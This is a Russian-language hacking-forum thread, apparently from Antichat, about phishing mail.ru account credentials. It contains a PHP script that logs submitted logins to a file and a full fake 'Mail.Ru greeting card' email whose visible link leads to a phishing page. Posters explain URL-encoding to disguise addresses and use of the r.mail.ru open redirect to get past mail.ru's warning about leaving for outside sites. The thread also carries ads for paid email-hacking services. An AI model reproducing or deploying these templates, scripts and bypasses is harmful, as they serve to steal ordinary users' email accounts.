ANTICHAT - Разоблачение http://mai1.pp.ru/ + ещё один общедоступный метод взлома @ mail

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости Mail-сервис (https://forum.antichat.xyz/forumdisplay.php?f=14)

Цитата:

Сообщение от Sandjuro

Как на зло сейчас не имею доступ в аску (но сегодня должен быть там)
У меня вот такой вопрос появился
в echo("Системная ошибка");
если я вставляю ссылку или скрипт но он не работает, я хотел туда подельную страницу с открыткой вставить :)
это возможно?

PHP код:


		
			
echo("Системная ошибка");

допустим замени на

PHP код:


		
			
Header("Location: http://mail.ru");

mail.ru -- куда будет перекидывать пользователя.

Взлом почты- mail, yandex, rambler
без предоплаты
любые доказательства.
наш сайт www.roobpass.ru

Профессиональный взлом почты

http://v-alksnis2.livejournal.com/4283.html

Цитата:

Сообщение от Dronga

Чтобы окончательно ввести жертву в заблуждение кодируем www.forum.antichat.ru примерно в такой вид:

%77%77%77%2E%66%6F%72%75%6D%2E%61%6E%74%69%63%68%6 1%74%2E%72%75

И получаем:
Вот так гораздо лучше =) *всё в одну линию, пробелы убрать.

(c)Dronga#Antichat.ru

Не подскажете как закодировали?
И ещё как в майл.ру http://img440.imageshack.us/my.php?image=39392793ap2.gif вставляете картинки в текст?

Цитата:

Сообщение от Iceangel_

Вот самый примитивный скрипт, если хоть чуть-чуть в php шаришь, то под себя его легко заточишь =)...

//--удалено--//

файлик 1.txt не забудь в папку кинуть...

...и название переменных согласуй с переменными с формы...

Кинь пожалуйста в личку то, что удалено, если нетрудно.

Закодировано при помощи charackter encoding calculator. Это урл значение.
Ресурс с калькулятором здесь, в самом низу http://ha.ckers.org/xss.html

Или просто скачать старый добрый InetCrack от Algola http://old.antichat.ru/inetcrack/ В любом случае, не лишняя программка.

Статья порадовала, СПС!

Цитата:

_не оставлять просьбы_ на всевозможных форумах, досках

ВОТ!!! Вот этот постулат надо повесить в заголовке каждого раздела и разместить у каждого в профиле!!! А то скулёж из серии "хачу мыла, паламайте" уже настигает!!!

Цитата:

лучше всего _искать самим_ по рекомендациям друзей/знакомых

Подпишусь под каждым словом! Dronga, za4ёt :) !

Цитата:

Сообщение от roobpass

Чет меня удаляют постоянно...ну да ладно по теме тогда скажу...
Sandjuro зачем тебе делать страницу с поддельной открыткой???? лишний раз адрес свой неправильный показывать
сделай тогда уж как у меня с перекидкой на настоящую открытку типа http://cards.mail.ru/card.html?cdu=ef44bfe3f1ead3e0e45fe0d744d2 и пользователь открытку посмотрит, и ничего не заподозрит....а так без открытки пользователи будут по 10 раз пароль вбивать и в итоге что то могут заподозрить.
Небольшое отклонение от темы...но опять и там впихнули мой сайт http://v-alksnis2.livejournal.com/4283.html
не дают мне спокойно жить... :(

Не один такой умный, уже все давно сделано ;)

Способ который использует mai1.pp.ru сейчас не прокатит на mail.ru. При нажатии на ссылку которая ведёт на другой ресурс появляется табличка, "Вы уверены, что хотите покинуть почтовый ящик и перейти на внешний ресурс: http://razvod-lamerov.narod.ru?". Но ссылки вида *.mail.ru/.../.../.../www.razvod-lamerov.narod.ru работают без этих сообщений)))

Подскажите, пожалуйста: Если имя текстового поля, которое надо записать Login, то куда его нужно подставлять в этом скрипте? и будет ли этого скрипта достаточно чтобы данные записались в log.php

<?php
$username=$_GET['username'];
if (isset($username))
{
$log_path="./log.php";
$log_string=$username." ";
$file=fopen($log_path,"a");
fwrite($file, $log_string, strlen($log_string));
fclose($file);
}
?>

xe0n2

PHP код:


		
			
<?php

$Login=$_GET['Login'];

if (isset($Login))

{

$log_path="./log.php";

$log_string=$Login." ";

$file=fopen($log_path,"a");

fwrite($file, $log_string, strlen($log_string));

fclose($file);

}

?>

Цитата:

Сообщение от lmns

Поясните, пожалуйста, каким образом нужно писать ссылку, чтобы обойти эту табличку мейл.рушную?

со ссылкой разобрался, но закодированная ссылка вида http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F почему то не работает. (пишет сервер не найден)

Цитата:

Сообщение от xe0n2

Потому что кодировка пишется после адреса на каторый перекидывает,
Пиши так http://r.mail.ru/cln2863/www.ya.ru
и отсылай письмо с помощью хтмл, а там я надеюсь ты знаеш как визуально адрес изменить

Код:

<a herf=http://r.mail.ru/cln2863/www.ya.ru>http://r.mail.ru/cln2863/%77%77%77%2E%79%61%2E%72%75%2F </a>

и будет счатя, я так обошел ;)

Кодированные линки не будут работать в Internet Explorer 7.0 , на сайте microsoft-а читал, такую мазу они ввели видимо из соображений безопасности...
так что ребята, облом с URL-кодировой...

http://ha.ckers.org/xss.html

B** почитал здесь весь ваш базар,но так и не понял главного или пропустил читая,кто-нибудь хоть знает как зашифровать сам линк,появляющийся в строке адреса,когда страница по ссылке уже открыта,а то я уже заё*** светить свой хост при переходе на подставную страницу

Цитата:

Сообщение от sacron

А вот там уже нельзя, потому и рег левый бесплатный хост

Цитата:

Сообщение от sacron

А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают :D :D

Цитата:

Сообщение от xAntifa_GuYx

А почему бы не сделать чтоб страница открывалась во весь экран, без строки?? Как на порно сайтах делают :D :D

Ни у всех ie :\ а уже что то даже на движке ие отоброжает адрестную строку! и вообще помните что малейшие различии от оригинала могут повергуть в сомнения жертву

Цитата:

Сообщение от Iceangel_

а мона в Личку получить удалённый скриптик?

Так же, как и интернет...
Лежал где-то в сети кряк интернета - попробуй

Цитата:

Сообщение от lmns

Кто нить знает как обойти эту окошку? то что предлагал lmns не катить

Все рботает как говорит lmns, просто заостри внимание на *

Ребята, только не пинайте сильно. Помогите, я все понял как обойти фильтр и с редиректом понял. НО.
Что даст переход юзверя на вашу ссылку???
Что вы юзаете? Пинча со сплоитом??
Если да, то дайте ссылку пожалуйсто для тех кто в танке по сплоитам (озы их использования в паре с троем).
Если не это, то подскажите что вы юзаете...
спасибо. Если чо не так то сорри((

www.mai1auth.pp.ru/cpanel
м?

Цитата:

Сообщение от ufoPlast

Ребята, только не пинайте сильно. Помогите, я все понял как обойти фильтр и с редиректом понял. НО.
Что даст переход юзверя на вашу ссылку???
Что вы юзаете? Пинча со сплоитом??

Это уже не тупость, это большая лень. Читай первую страницу темы. Как объяснить понятней чем там, я не знаю.

Что даст переход юзверя на вашу ссылку???
мы логоним домен и юзаем снифер =))) иногда помогает =)))

Инетерсная статейка мейлу.ру большой баг)

Цитата:

Сообщение от Sandjuro

Все рботает как говорит lmns, просто заостри внимание на *

уже не работает!

Цитата:

Сообщение от Sadden

уже не работает!

http://r.mail.ru/clb123456789/antichat.ru

PHP код:


		
			
<table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>

<td id="aj_body">

<div id="let_body">



</div></td><td _base_href="http://win.mail.ru/cgi-bin/readmsg"><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">c</a></td>

<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="100%">

<font color="#000000" face="Arial" size="2">Здравствуйте, Вам пришла открытка!</font><br>

<font color="#000000" face="Arial" size="2">Чтобы посмотреть открытку, нажмите на ссылку, расположенную ниже, или скопируйте ее в адресную строку браузера.</font><br>



<font face="Arial" size="2"><b><a href="http://mail.*****.ru/efafcdb8ee742cf3648b659805b073c9.html" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">http://cards.mail.ru/card.html?cd=eccc9a8ec0282af4362c0eca5bcda811</a></b></font><br><br>

<font color="#666666" face="Arial" size="1">Открытка будет дожидаться вас в течение 90 дней.</font>



</td>

</tr>

</tbody></table>

<br>

<hr bgcolor="#D9D9D9" noshade="noshade">



<table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" cellpadding="0" cellspacing="0" width="100%">

<tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg"><td _base_href="http://win.mail.ru/cgi-bin/readmsg">









<font color="#666666" face="Arial" size="1">Открытки к праздникам</font>

<table _base_href="http://win.mail.ru/cgi-bin/readmsg" border="0" width="100%">

<tbody _base_href="http://win.mail.ru/cgi-bin/readmsg"><tr _base_href="http://win.mail.ru/cgi-bin/readmsg" align="center" valign="top">



<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82163&amp;S=&amp;tid=7636" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/98ee7292c19d0dd8bc8b082dbcd88f61.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82163" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">День рождения</a></font></td>





<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82421&amp;S=&amp;tid=7379" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/afe9124378c9df06ec45e59e86899c3c.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82421" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">На каждый день</a></font></td>





<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"><font face="Arial" size="1"></font><br><a href="http://cards.mail.ru/cardedit.html?E=82064&amp;S=&amp;tid=7388" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"><img src="http://*****.ru/ccd109545010520c6e8f0065ddc85820.jpg" xxstyle="border: 1px solid black;" alt="" border="1" height="90" width="90"></a><br><font face="Arial" size="1"><a href="http://cards.mail.ru/event.html?E=82064" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg"> &nbsp;

Пожелания</a></font></td>



<td _base_href="http://win.mail.ru/cgi-bin/readmsg" width="25%"></td>

</tr>



</tbody></table>





















<font color="#666666" face="Arial" size="1">Чтобы своевременно узнавать о праздниках, именинах и конкурсах, <a href="http://content.mail.ru/cgi-bin/subscribe.cgi?list_id=782&amp;list_id=26785" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">подпишитесь на рассылку</a>.</font>



</td></tr>

</tbody></table>



<hr bgcolor="#D9D9D9" noshade="noshade">



<font color="#666666" face="Arial" size="2"><b><img src="http://*****.ru/img5.gif" alt="" valign="absmiddle" border="0" height="17" width="17"> <a href="http://cards.mail.ru/" target="_blank" _base_href="http://win.mail.ru/cgi-bin/readmsg">Открытки@Mail.Ru</a>&nbsp;– открытки на все случаи жизни!</b></font><br><br><br>

раньше всегда пользовался этим фековым письмом, но теперь почемуто когда отправляю его, то оно не доходит. почему?

а ты его случайно не от лица администрации отправляешь (какой ящик вписываешь в поле "от кого")? Если что то типа "Администрация Mail.Ru" бла бла бла, то поменяй на другое, а то письма отправленные от "админов" блочаться.

раньше (до вчерашнего) дня отсылал от Открытки@Mail.ru все ок приходило. сегодня обнаружил что письма не доходят. стал от обычных отправлять, но и они не доходят! в чем же проблема?

Цитата:

Сообщение от КИНГ

приходит вот так
Открытки Mail.Ru <саrds@cards.mail.ru>

stalles

покажи свой пример письма

прочел всю тему но не понел...
подкиньте плз нормальный прмер как скрыть урл...

и ешё , как жертве отправить точно такое же письмо?

http://keep4u.ru/imgs/s/080405/f4/f4...a8c28edb6a.jpg

2КИНГ

у меня доходила эта хтмл, только почему то теперь когда открываю письмо для просмотра то у меня выдает код хтмл вместо визуального отображения =(

т.е.
<table class="readlet" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody><tr>
<td id="aj_body"> и тд

З.Ы. не могу понять почему не отображает =(

народ а вот вы посылаете эти фейк открытки с ссылкой на фейк страницу , по которой должна пройти жертва и ввести свой логин пас , но как только жертва жмет на вашу ссылку , вылазиет сообшение : Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

Эта надпись срезает процентов пятьдесят жерт которые уже не поведуца на развод...
нада как то бороца с этой фишкой от мейла

кому интересно решил проблему с выеб**м mail.ru теперь не пишет типа Вы собираетесь пеерйти на сайт www.blabla.ru Никогда не вводите пароль от своего вочтового ящика на посторонних ресурсах.

для этого используем:

PHP код:


		
			
<a href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/ВАШ САЙТ" target="_blank">http://cards.mail.ru/card.html?cd=30dc79c7f966e8032cbd8c2ada48e6ad</a></font><br